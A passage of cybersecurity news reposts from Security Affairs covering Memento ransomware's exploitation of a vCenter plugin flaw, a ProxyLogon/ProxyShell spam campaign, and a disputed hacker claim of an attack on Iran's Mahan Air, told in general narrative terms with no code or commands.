“The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the advisory published“A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. “

The issue affects vCenter Server plugin for vROPs which is available in all default installations. vROPs does not need be present to have this endpoint available. The virtualization giant has provided workarounds to disable it.

VMware addressed the flaw in February, but thousands of installs remained unpatched and groups like the Memento Team focused their operations on their exploitation-

Below is the attack chain used by the Memento gang:

memento ransomware

Once gained access to the target network, the intruders first attempted to expand their reach using RDP, then after a couple of weeks began to use WinRAR to compress a collection of files for exfiltration. The ransomware operators move the archives to a directory on a shared drive they could access via RDP before deleting any files using Jetico’s BCWipe data wiping utility.

“The modifications to the ransomware changed its behavior to avoid detection of encryption activity. Instead of encrypting files, the “crypt” code now put the files in unencrypted form into archive files, using the copy of WinRAR, saving each file in its own archive with a .vaultz file extension. Passwords were generated for each file as it was archived. Then the passwords themselves were encrypted.” reads the analysis published by Sophos. “These variants were built and executed hours after the first attempt. The malware was spread manually by the attackers, using RDP and stolen credentials.”

Sophos states that in the attacks that it has investigated, victims did not pay the ransom because used their backups to restore the files.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Memento ransomware)

The post New Memento ransomware uses password-protected WinRAR archives to block access to the files appeared first on Security Affairs.

Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns

22 November 2021 at 11:47
Threat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems. The findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a

Iran’s Mahan Air claims it has failed a cyber attack, hackers say the opposite

22 November 2021 at 11:49

Iranian airline Mahan Air was hit by a cyberattack on Sunday morning, the “Hooshyarane Vatan” hacker group claimed responsibility for the attack.

Iranian private airline Mahan Air has foiled a cyber attack over the weekend, Iranian state media reported. The airliner’s flight schedule was not affected by the cyberattack.

“Our international and domestic flights are operating on schedule without any disruptions,” Amirhossein Zolanvari, head of the airliner’s public relation office told state TV.

According to Iran’s Fars News Agency, Mahan Air was hit by similar attacks “many times,” for this reason Mahan’s Cyber Security Team rapidly neutralized these attacks.

“This is considered a normal occurrence and Mahan’s Cyber Security Team has always acted intelligently and in a timely manner to neutralize these attacks,” said the company, adding that all flights were on schedule and that the company would update if any flights were disrupted.

Hooshyarane Vatan hacker group claimed responsibility for the attack and added that it was able to access internal documents, emails and reports that linked the airline to the IRGC. The group explained that the company was able to detect the security breach, but did not stop it.

ما گروه هوشیاران وطن علیه شرکت #ماهان_ایر بعنوان قلب تپنده عملیات قاچاقی #سپاه_پاسداران عملیات سایبری انجام دادیم. #اهواز #نه_به_جمهوري_اسلامي #IranProtests #MahanAir pic.twitter.com/bBkfBKJ4uK

— Hooshyarane Vatan (@Hooshyaran1) November 21, 2021

The US had sanctioned Mahan Air in 2011 for providing financial, material, or technological support to Iran’s Islamic Revolutionary Guard Corps.

The tension is high between Teheran and the Western countries, the latter are blaming Iran for a series of attacks against organizations worldwide.

A joint advisory released by government agencies (the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC)) in the U.S., U.K., and Australia warns that Iran-linked threat actors are exploiting Fortinet and Microsoft Exchange vulnerabilities in attacks aimed at critical infrastructure in the US and Australian organizations.

Microsoft Threat Intelligence Center (MSTIC) recently shared the results of their analysis on the evolution of Iran-linked threat actors at the CyberWarCon 2021. Over the past 12 months, MSTIC experts observed increasingly sophisticated attacks orchestrated by Iranian APT groups.

Iran has been targeted by a series of cyber attacks in the past months, in October a cyber attack has disrupted gas stations from the state-owned National Iranian Oil Products Distribution Company (NIOPDC) across Iran. The attack also defaced the screens at the gas pumps and gas price billboards.

Digital screens at the affected stations were displaying the message “cyberattack 64411,” which was also shown on the billboards of Iranian train stations during another attack that took place in July and that hit Iran’s railroad system.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Iran’s Mahan Air)

The post Iran’s Mahan Air claims it has failed a cyber attack, hackers say the opposite appeared first on Security Affairs.